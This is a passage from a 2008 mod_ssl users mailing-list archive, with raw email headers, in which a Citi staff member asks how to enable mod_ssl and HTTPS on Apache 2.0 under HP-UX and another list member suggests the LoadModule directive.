software out there (Apache included) won't deal with it.

BTW: To handle the case that you are trying to do, there was a patch sent i=
n=20
by  Erwann ABALEA from Keynectis to the OpenSSL Users mailing list in=20
January/February this year, IIRC. Perhaps you could try that - you'd have t=
o=20
do some fairly exotic things to mod_ssl, mind you to get it to work :)

I'm with Michael - stop using the same name each time. Version your CAs.

Have fun.

=2D-=20
Patrick Patterson
President and Chief PKI Architect,
Carillon Information Security Inc.
http://www.carillon.ca
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 17 23:26:17 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 43F9A14DA61; Tue, 17 Jun 2008 23:26:17 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.citigroup.com (smtp2.citigroup.com [192.193.221.103])
	by master.modssl.org (Postfix) with ESMTP id A4C6414D836
	for ; Tue, 17 Jun 2008 23:26:16 +0200 (CEST)
Received: from imbarc-ny01.ny.ssmb.com (imbarc-ny01.ny.ssmb.com [162.124.186.138])
	by imbaspam-ss01.namdmz.dmzroot.net (8.13.8/8.13.8/SSMB_EXT/ev: 16778 $) with ESMTP id m5HLPkDQ028713
	for ; Tue, 17 Jun 2008 21:25:46 GMT
Received: from mailhub-nyc3.ny.ssmb.com (mailhub-nyc3-hme0.ny.ssmb.com [162.124.148.17])
	by imbarc-ny01.ny.ssmb.com (8.13.8/8.13.8/SSMB_QQQ_IN/1.1) with ESMTP id m5HLPhfr013762
	for ; Tue, 17 Jun 2008 21:25:43 GMT
Received: from exlmdsm02.lac.nsroot.net (EXLMDSM02.lac.nsroot.net [169.193.142.75])
	by mailhub-nyc3.ny.ssmb.com (8.13.8/8.13.8/CG_HUB) with ESMTP id m5HLPgPu012252
	for ; Tue, 17 Jun 2008 21:25:43 GMT
Received: from exlbrmb07.lac.nsroot.net ([169.167.113.8]) by exlmdsm02.lac.nsroot.net with Microsoft SMTPSVC(5.0.2195.6713);
	 Tue, 17 Jun 2008 17:25:42 -0400
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C8D0C0.B10C3417"
X-MimeOLE: Produced By Microsoft Exchange V6.0.6619.12
Subject: Question about mod_ssl & mod_jk
Date: Tue, 17 Jun 2008 18:25:40 -0300
Message-ID: <61A49EACE4B520449427D0FF6DB5E76005905FCC@exlbrmb07.lac.nsroot.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Question about mod_ssl & mod_jk
Thread-Index: AcjQvr6aW0whvzZBQoiWqQVUA7lUCQAAdKDg
From: "Tan, Liao " 
To: 
Cc: "*Latam BTC BO Development and UAT Support" 
X-OriginalArrivalTime: 17 Jun 2008 21:25:42.0619 (UTC) FILETIME=[B27242B0:01C8D0C0]
X-Scanned-By: MIMEDefang 2.52 on 169.175.16.180
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tan, Liao " 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C8D0C0.B10C3417
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


=20

All,
  My apache installed is has only the mod_jk.sl in the "libexec/" =
directory.
 I want to know what I need to do in order to to configure my current =
http to https? I know this is a very general question, but to start, I =
guess I need to include the directives in httpd.conf:

1)
  LoadModule ssl_module libexec/mod_ssl.so
  
=20
2)
  AddModule mod_ssl.c
  

Already have all certificates configured in the paths. But still unsure =
on if simply adding those 2 directives will be enough, and will put the =
file (mod_ssl.so) there in the path, or if I have to get this file from =
somewhere (if so, how?)

Here are the environment configuration:
Web server: Apache/2.0.46 (Unix) mod_jk/1.2.4
Server: -HP-UX lath09 B.11.11 U 9000/800 690359356 unlimited-user =
license
Tomcat: 4.0

Ask for your kind and prompt support.

Thank you.
Ingrid Liao
Citi Markets & Banking | CMB Technology
Brazil Technology Solutions Center | Business Intelligence, Database & =
Support Services
Tel. +55-11-3741-6274
Fax. +55-11-3741-6285
Email: liao.tan@citi.com




------_=_NextPart_001_01C8D0C0.B10C3417
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable










 



  
All,
  =
My apache=20
  installed is has only the mod_jk.sl in the "libexec/" =
directory.
 I=20
  want to know what I need to do in order to to configure my current =
http to=20
  https? I know this is a very general question, but to start, I guess I =
need to=20
  include the directives in httpd.conf:

1)<IfDefine SSL>

  
  =
LoadModule=20
  ssl_module libexec/mod_ssl.so
 =20
  </IfDefine>

  
 

  
2)<IfDefine=20
  SSL>

  
 =20
  AddModule mod_ssl.c

  
 =20
  </IfDefine>

Already have all certificates =
configured in=20
  the paths. But still unsure on if simply adding those 2 directives =
will be=20
  enough, and will put the file (mod_ssl.so) there in the path, or if I =
have to=20
  get this file from somewhere (if so, how?)

Here are the =
environment=20
  configuration:
Web server: Apache/2.0.46 (Unix) =
mod_jk/1.2.4
Server:=20
  -HP-UX lath09 B.11.11 U 9000/800 690359356 unlimited-user =
license
Tomcat:=20
  4.0

Ask for your kind and prompt support.

Thank=20
  you.
Ingrid Liao
Citi Markets & Banking | CMB =
Technology
Brazil=20
  Technology Solutions Center | Business Intelligence, Database & =
Support=20
  Services
Tel. +55-11-3741-6274
Fax. +55-11-3741-6285
Email:=20
  =
liao.tan@citi.com



------_=_NextPart_001_01C8D0C0.B10C3417--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 18 17:23:14 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 40FD814DA44; Wed, 18 Jun 2008 17:23:14 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.citigroup.com (mail4.ssmb.com [199.67.179.104])
	by master.modssl.org (Postfix) with ESMTP id 4E23914DA33
	for ; Wed, 18 Jun 2008 17:23:12 +0200 (CEST)
Received: from imbarc-nj01.nj.ssmb.com (imbarc-nj01.nj.ssmb.com [150.110.115.169])
	by imbaspam-ny04.ssmb.com (8.13.8/8.13.8/SSMB_EXT/ev: 16778 $) with ESMTP id m5IFMerP013164
	for ; Wed, 18 Jun 2008 15:22:41 GMT
Received: from mailhub-nj03-1.nj.ssmb.com (mailhub-nj03-1.nj.ssmb.com [150.110.237.160])
	by imbarc-nj01.nj.ssmb.com (8.13.8/8.13.8/SSMB_QQQ_IN/1.1) with ESMTP id m5IFMNTQ008396
	for ; Wed, 18 Jun 2008 15:22:23 GMT
Received: from exlnjsm02.lac.nsroot.net (EXLNJSM02.lac.nsroot.net [150.110.141.51])
	by mailhub-nj03-1.nj.ssmb.com (8.13.8/8.13.8/CG_HUB) with ESMTP id m5IFMNVc013576
	for ; Wed, 18 Jun 2008 15:22:23 GMT
Received: from exlbrmb07.lac.nsroot.net ([169.167.113.8]) by exlnjsm02.lac.nsroot.net with Microsoft SMTPSVC(5.0.2195.6713);
	 Wed, 18 Jun 2008 11:22:22 -0400
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft Exchange V6.0.6619.12
Subject: Pls subscribe my email
Date: Wed, 18 Jun 2008 12:22:20 -0300
Message-ID: <61A49EACE4B520449427D0FF6DB5E76005905FD7@exlbrmb07.lac.nsroot.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Pls subscribe my email
Thread-Index: AcjRVxnOmH+3IHFtRBGMv5jUhZ6Y/w==
From: "Tan, Liao " 
To: 
X-OriginalArrivalTime: 18 Jun 2008 15:22:22.0998 (UTC) FILETIME=[1B45D360:01C8D157]
X-Scanned-By: MIMEDefang 2.52 on 199.67.177.46
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tan, Liao " 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

thnak you

Ingrid Liao
Citi Markets & Banking | CMB Technology
Brazil Technology Solutions Center | Business Intelligence, Database & =
Support Services
Tel. +55-11-3741-6274=20
Fax. +55-11-3741-6285
Email: liao.tan@citi.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 18 17:30:53 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3D81914DA3C; Wed, 18 Jun 2008 17:30:53 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.citigroup.com (smtp2.citigroup.com [192.193.221.103])
	by master.modssl.org (Postfix) with ESMTP id BF4C814DA24
	for ; Wed, 18 Jun 2008 17:30:52 +0200 (CEST)
Received: from imbarc-nj02.nj.ssmb.com (imbarc-nj02.nj.ssmb.com [150.110.177.216])
	by imbaspam-ss01.namdmz.dmzroot.net (8.13.8/8.13.8/SSMB_EXT/ev: 16778 $) with ESMTP id m5IFUKxa029004
	for ; Wed, 18 Jun 2008 15:30:21 GMT
Received: from mailhub-nj03-1.nj.ssmb.com (mailhub-nj03-1.nj.ssmb.com [150.110.237.160])
	by imbarc-nj02.nj.ssmb.com (8.13.8/8.13.8/SSMB_QQQ_IN/1.1) with ESMTP id m5IFUHH6021085
	for ; Wed, 18 Jun 2008 15:30:17 GMT
Received: from exlnjsm02.lac.nsroot.net (EXLNJSM02.lac.nsroot.net [150.110.141.51])
	by mailhub-nj03-1.nj.ssmb.com (8.13.8/8.13.8/CG_HUB) with ESMTP id m5IFUAA5000872
	for ; Wed, 18 Jun 2008 15:30:17 GMT
Received: from exlbrmb07.lac.nsroot.net ([169.167.113.8]) by exlnjsm02.lac.nsroot.net with Microsoft SMTPSVC(5.0.2195.6713);
	 Wed, 18 Jun 2008 11:30:14 -0400
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft Exchange V6.0.6619.12
Subject: Need to add/enable/install mod_ssl
Date: Wed, 18 Jun 2008 12:30:12 -0300
Message-ID: <61A49EACE4B520449427D0FF6DB5E7600596D653@exlbrmb07.lac.nsroot.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Need to add/enable/install mod_ssl
Thread-Index: AcjRWDL1+tdCUC6PQHuI40q42b7ObA==
From: "Tan, Liao " 
To: 
X-OriginalArrivalTime: 18 Jun 2008 15:30:14.0467 (UTC) FILETIME=[344A4930:01C8D158]
X-Scanned-By: MIMEDefang 2.52 on 169.175.16.180
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tan, Liao " 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi, experts:

>> Here are the environment configuration:
>> Web server: Apache/2.0.46 (Unix) mod_jk/1.2.4
>> Server: -HP-UX =20
>> Tomcat: 4.0

I have a apache already installed (by other team, which doesnt know if =
there=B4s the module mod_ssl). The final purpose is to secure my current =
http to https. Already have all cerficates, with the directives in the =
conf files, and still the https url doesnt work yet.
I searched over all logs I could find, and didnt found any string =
"mod_ssl":(. So I guess I need to do something to enable, install it.=20

Saw in a link that I need to download the source in modssl.org, and =
other installation procedures as well. But the in my case is that I =
already have Apache installed, and need only to add/enable/install the =
mod_ssl module. Ok, now another question to be pointed out:
"Make sure any module for your Apache server is compiled with the    =20
        compiler-flag -DEAPI, or your Webserver might crash or can not =
be   =20
        started.                                                         =
   =20
Almost all modules I know adds the -DEAPI flag by themself except =
mod_jserv
and mod_jk"

But my apache installed is mod_jk (my configuration >> Apache/2.0.46 =
(Unix) mod_jk/1.2.4). Should I supppose from this that in my case I dont =
have the DEAPI??? Not sure on what to do now. How will I check if it has =
DEAPI?=20

I keep doing searches over the net, but in case any of you has some hint =
and speed up a little bit on my side, it=B4ll be helpful.

Im kind of disorientated with all this thing of https. This=B4s the 1st =
time i get into it. So, ask for your detailed support.

Thank you!
Ingrid=20

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 18 20:40:33 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A90F214DA62; Wed, 18 Jun 2008 20:40:33 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.citigroup.com (mail1.ssmb.com [199.67.179.103])
	by master.modssl.org (Postfix) with ESMTP id 8564014D858
	for ; Wed, 18 Jun 2008 20:40:31 +0200 (CEST)
Received: from imbarc-ny01.ny.ssmb.com (imbarc-ny01-1 [162.124.186.138])
	by imbaspam-ny03.ssmb.com (8.13.8/8.13.8/SSMB_EXT/ev: 16778 $) with ESMTP id m5IIdxij027819
	for ; Wed, 18 Jun 2008 18:40:00 GMT
Received: from mailhub-nyc3.ny.ssmb.com (mailhub-nyc3-hme0.ny.ssmb.com [162.124.148.17])
	by imbarc-ny01.ny.ssmb.com (8.13.8/8.13.8/SSMB_QQQ_IN/1.1) with ESMTP id m5IIdl9D011386
	for ; Wed, 18 Jun 2008 18:39:47 GMT
Received: from exlmdsm02.lac.nsroot.net (EXLMDSM02.lac.nsroot.net [169.193.142.75])
	by mailhub-nyc3.ny.ssmb.com (8.13.8/8.13.8/CG_HUB) with ESMTP id m5IIdkjj024494
	for ; Wed, 18 Jun 2008 18:39:47 GMT
Received: from exlbrmb07.lac.nsroot.net ([169.167.113.8]) by exlmdsm02.lac.nsroot.net with Microsoft SMTPSVC(5.0.2195.6713);
	 Wed, 18 Jun 2008 14:39:47 -0400
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft Exchange V6.0.6619.12
Subject: RE: Need to add/enable/install mod_ssl
Date: Wed, 18 Jun 2008 15:39:29 -0300
Message-ID: <61A49EACE4B520449427D0FF6DB5E7600596D655@exlbrmb07.lac.nsroot.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Need to add/enable/install mod_ssl
Thread-Index: AcjRWDL1+tdCUC6PQHuI40q42b7ObAAGdNSw
From: "Tan, Liao " 
To: 
X-OriginalArrivalTime: 18 Jun 2008 18:39:47.0514 (UTC) FILETIME=[AF2789A0:01C8D172]
X-Scanned-By: MIMEDefang 2.52 on 199.67.177.41
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tan, Liao " 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

All,

 I=B4m told that having the directives in httpd.conf


SSLRandomSeed startup builtin
SSLRandomSeed connect builtin


means that my apache is configured with mod_ssl (thanks to the guy that =
told me so!)

Now the question risen up is how do I do to have my https working? As I =
mentioned below, already have all certificates and their directives =
configured.

Thanks for your attention.

Ingrid=20



-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Tan, Liao [CMB-IT]
Sent: Wednesday, June 18, 2008 12:30 PM
To: modssl-users@modssl.org
Subject: Need to add/enable/install mod_ssl


Hi, experts:

>> Here are the environment configuration:
>> Web server: Apache/2.0.46 (Unix) mod_jk/1.2.4
>> Server: -HP-UX =20
>> Tomcat: 4.0

I have a apache already installed (by other team, which doesnt know if =
there=B4s the module mod_ssl). The final purpose is to secure my current =
http to https. Already have all cerficates, with the directives in the =
conf files, and still the https url doesnt work yet.
I searched over all logs I could find, and didnt found any string =
"mod_ssl":(. So I guess I need to do something to enable, install it.=20

Saw in a link that I need to download the source in modssl.org, and =
other installation procedures as well. But the in my case is that I =
already have Apache installed, and need only to add/enable/install the =
mod_ssl module. Ok, now another question to be pointed out:
"Make sure any module for your Apache server is compiled with the    =20
        compiler-flag -DEAPI, or your Webserver might crash or can not =
be   =20
        started.                                                         =
   =20
Almost all modules I know adds the -DEAPI flag by themself except =
mod_jserv
and mod_jk"

But my apache installed is mod_jk (my configuration >> Apache/2.0.46 =
(Unix) mod_jk/1.2.4). Should I supppose from this that in my case I dont =
have the DEAPI??? Not sure on what to do now. How will I check if it has =
DEAPI?=20

I keep doing searches over the net, but in case any of you has some hint =
and speed up a little bit on my side, it=B4ll be helpful.

Im kind of disorientated with all this thing of https. This=B4s the 1st =
time i get into it. So, ask for your detailed support.

Thank you!
Ingrid=20

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 18 22:06:52 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4C86514DA65; Wed, 18 Jun 2008 22:06:52 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.sep.com (IP-216-37-52-133.nframe.net [216.37.52.133])
	by master.modssl.org (Postfix) with ESMTP id 8A69914D858
	for ; Wed, 18 Jun 2008 22:06:51 +0200 (CEST)
Received: from legolas.net.sep.com (legolas.sep.com [172.16.0.52])
	by mail.sep.com (Postfix) with ESMTP id 92C273E26
	for ; Wed, 18 Jun 2008 16:06:20 -0400 (EDT)
Date: Wed, 18 Jun 2008 16:03:41 -0400 (Eastern Daylight Time)
From: "David P. Mott" 
To: modssl-users@modssl.org
Subject: RE: Need to add/enable/install mod_ssl
In-Reply-To: <61A49EACE4B520449427D0FF6DB5E7600596D655@exlbrmb07.lac.nsroot.net>
Message-ID: 
References: <61A49EACE4B520449427D0FF6DB5E7600596D655@exlbrmb07.lac.nsroot.net>
X-X-Sender: dpmott@gothmog.sep.com
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; boundary="22147171-9966-1213819253=:4596"
Content-ID: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David P. Mott" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.

--22147171-9966-1213819253=:4596
Content-Type: TEXT/PLAIN; charset=X-UNKNOWN; format=flowed
Content-Transfer-Encoding: QUOTED-PRINTABLE
Content-ID: 


That doesn't sound right.

Don't you need a statement like this in your httpd.conf file?

   LoadModule ssl_module modules/mod_ssl.so

The statements that you mentioned will do stuff /only/ if the ssl module=20
is loaded (that's what IfModule means -- If the Module is Present).

-Dave


On Wed, 18 Jun 2008, Tan, Liao wrote:

> All,
>
> I=B4m told that having the directives in httpd.conf
>
> 
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> 
>
> means that my apache is configured with mod_ssl (thanks to the guy that t=
old me so!)
>
> Now the question risen up is how do I do to have my https working? As I m=
entioned below, already have all certificates and their directives configur=
ed.
>
> Thanks for your attention.
>
> Ingrid
>
--22147171-9966-1213819253=:4596--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 18 22:12:12 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 81B2E14DA65; Wed, 18 Jun 2008 22:12:12 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.citigroup.com (smtp1.citigroup.com [199.67.179.116])
	by master.modssl.org (Postfix) with ESMTP id EF76014D858
	for ; Wed, 18 Jun 2008 22:12:11 +0200 (CEST)
Received: from imbarc-ny01.ny.ssmb.com (imbarc-ny01-1 [162.124.186.138])
	by imbaspam-nj03.iplex.ssmb.com (8.13.8/8.13.8/SSMB_EXT/ev: 16778 $) with ESMTP id m5IKBaL3005437
	for ; Wed, 18 Jun 2008 20:11:37 GMT
Received: from mailhub-ss01.nam.nsroot.net (mailhub-ss01.nam.nsroot.net [153.40.230.247])
	by imbarc-ny01.ny.ssmb.com (8.13.8/8.13.8/SSMB_QQQ_IN/1.1) with ESMTP id m5IKBWwC000825
	for ; Wed, 18 Jun 2008 20:11:32 GMT
Received: from exmdsm01.lac.nsroot.net (EXMDSM01.lac.nsroot.net [163.35.201.36])
	by mailhub-ss01.nam.nsroot.net (8.13.8/8.13.8/CG_HUB) with ESMTP id m5IKBWET006896
	for ; Wed, 18 Jun 2008 20:11:32 GMT
Received: from exlbrmb07.lac.nsroot.net ([169.167.113.8]) by exmdsm01.lac.nsroot.net with Microsoft SMTPSVC(5.0.2195.6713);
	 Wed, 18 Jun 2008 16:11:32 -0400
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft Exchange V6.0.6619.12
Subject: RE: Need to add/enable/install mod_ssl
Date: Wed, 18 Jun 2008 17:11:27 -0300
Message-ID: <61A49EACE4B520449427D0FF6DB5E7600596D657@exlbrmb07.lac.nsroot.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Need to add/enable/install mod_ssl
Thread-Index: AcjRftM0LqJR1QdYQnWk6BM5YcFxVgAACPGQ
From: "Tan, Liao " 
To: 
X-OriginalArrivalTime: 18 Jun 2008 20:11:32.0058 (UTC) FILETIME=[801E4BA0:01C8D17F]
X-Scanned-By: MIMEDefang 2.52 on 199.67.177.247
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tan, Liao " 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

David,

 that was what I thought earlier. But since I=B4m told this directive is =
for Apache 1.x, and not Apache 2.0 (which is mine), I wonder how differ =
the directive to include to httpd.conf. What I mean is that I think I hv =
the mod_ssl installed, but not enabled yet, and to enable, if it=B4s =
simply adding the directive=B4s in httpd file, and the exact syntax for =
version 2.0.
 Still searching for the solution.

Thanks

Ingrid=20



-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of David P. Mott
Sent: Wednesday, June 18, 2008 5:04 PM
To: modssl-users@modssl.org
Subject: RE: Need to add/enable/install mod_ssl



That doesn't sound right.

Don't you need a statement like this in your httpd.conf file?

   LoadModule ssl_module modules/mod_ssl.so

The statements that you mentioned will do stuff /only/ if the ssl module =

is loaded (that's what IfModule means -- If the Module is Present).

-Dave


On Wed, 18 Jun 2008, Tan, Liao wrote:

> All,
>
> I=B4m told that having the directives in httpd.conf
>
> 
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> 
>
> means that my apache is configured with mod_ssl (thanks to the guy =
that told me so!)
>
> Now the question risen up is how do I do to have my https working? As =
I mentioned below, already have all certificates and their directives =
configured.
>
> Thanks for your attention.
>
> Ingrid
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 18 22:25:22 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 46B1614DA65; Wed, 18 Jun 2008 22:25:22 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.sep.com (IP-216-37-52-133.nframe.net [216.37.52.133])
	by master.modssl.org (Postfix) with ESMTP id A292614D858
	for ; Wed, 18 Jun 2008 22:25:21 +0200 (CEST)
Received: from legolas.net.sep.com (legolas.sep.com [172.16.0.52])
	by mail.sep.com (Postfix) with ESMTP id 39FB33E26
	for ; Wed, 18 Jun 2008 16:24:51 -0400 (EDT)
Date: Wed, 18 Jun 2008 16:22:12 -0400 (Eastern Daylight Time)
From: "David P. Mott" 
To: modssl-users@modssl.org
Subject: RE: Need to add/enable/install mod_ssl
In-Reply-To: <61A49EACE4B520449427D0FF6DB5E7600596D657@exlbrmb07.lac.nsroot.net>
Message-ID: 
References: <61A49EACE4B520449427D0FF6DB5E7600596D657@exlbrmb07.lac.nsroot.net>
X-X-Sender: dpmott@gothmog.sep.com
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; boundary="23200046-15450-1213820306=:4596"
Content-ID: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David P. Mott" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.

--23200046-15450-1213820306=:4596
Content-Type: TEXT/PLAIN; charset=X-UNKNOWN; format=flowed
Content-Transfer-Encoding: QUOTED-PRINTABLE
Content-ID: 


I pulled that exact line from my win32 version of Apache 2.2.4.

Server Version: Apache/2.2.4 (Win32) mod_ssl/2.2.4 OpenSSL/0.9.8d mod_perl/=
2.0.3 Perl/v5.8.8
Server Built: Jan 9 2007 23:17:20

-Dave


On Wed, 18 Jun 2008, Tan, Liao wrote:

> David,
>
> that was what I thought earlier. But since I=B4m told this directive is=
=20
> for Apache 1.x, and not Apache 2.0 (which is mine), I wonder how differ=
=20
> the directive to include to httpd.conf. What I mean is that I think I hv=
=20
> the mod_ssl installed, but not enabled yet, and to enable, if it=B4s=20
> simply adding the directive=B4s in httpd file, and the exact syntax for=
=20
> version 2.0.
>
> Still searching for the solution.
>
> Thanks
>
> Ingrid
--23200046-15450-1213820306=:4596--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 18 22:34:44 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 508DF14DA65; Wed, 18 Jun 2008 22:34:44 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.citigroup.com (mail2.citigroup.com [192.193.221.104])
	by master.modssl.org (Postfix) with ESMTP id 892D514D858
	for ; Wed, 18 Jun 2008 22:34:34 +0200 (CEST)
Received: from imbarc-nj01.nj.ssmb.com (imbarc-nj01.nj.ssmb.com [150.110.115.169])
	by imbaspam-ss02.namdmz.dmzroot.net (8.13.8/8.13.8/SSMB_EXT/ev: 16778 $) with ESMTP id m5IKY3MC007818
	for ; Wed, 18 Jun 2008 20:34:03 GMT
Received: from mailhub-ss01.nam.nsroot.net (mailhub-ss01.nam.nsroot.net [153.40.230.247])
	by imbarc-nj01.nj.ssmb.com (8.13.8/8.13.8/SSMB_QQQ_IN/1.1) with ESMTP id m5IKXvda018680
	for ; Wed, 18 Jun 2008 20:33:57 GMT
Received: from exmdsm01.lac.nsroot.net (EXMDSM01.lac.nsroot.net [163.35.201.36])
	by mailhub-ss01.nam.nsroot.net (8.13.8/8.13.8/CG_HUB) with ESMTP id m5IKXrT3024575
	for ; Wed, 18 Jun 2008 20:33:57 GMT
Received: from exlbrmb07.lac.nsroot.net ([169.167.113.8]) by exmdsm01.lac.nsroot.net with Microsoft SMTPSVC(5.0.2195.6713);
	 Wed, 18 Jun 2008 16:33:52 -0400
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft Exchange V6.0.6619.12
Subject: RE: Need to add/enable/install mod_ssl
Date: Wed, 18 Jun 2008 17:33:50 -0300
Message-ID: <61A49EACE4B520449427D0FF6DB5E7600596D658@exlbrmb07.lac.nsroot.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Need to add/enable/install mod_ssl
Thread-Index: AcjRgXMnkFerkpnIT3i/wfZLXYnAFQAAJG4A
From: "Tan, Liao " 
To: 
X-OriginalArrivalTime: 18 Jun 2008 20:33:52.0214 (UTC) FILETIME=[9EE9DF60:01C8D182]
X-Scanned-By: MIMEDefang 2.52 on 169.175.16.181
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tan, Liao " 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Dave and All:

Ok, now I know I can try the directives in my apache.=20
Althought by the directives SSLRandomSeed it=B4s indicating I have the =
mod_ssl installed, I checked and the files mod_ssl.so and mod_ssl.c are =
not in the paths indicated, not in libexec/, nor in module/.
How do I get those files?=20

Thank you.
Ingrid=20



-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of David P. Mott
Sent: Wednesday, June 18, 2008 5:22 PM
To: modssl-users@modssl.org
Subject: RE: Need to add/enable/install mod_ssl



I pulled that exact line from my win32 version of Apache 2.2.4.

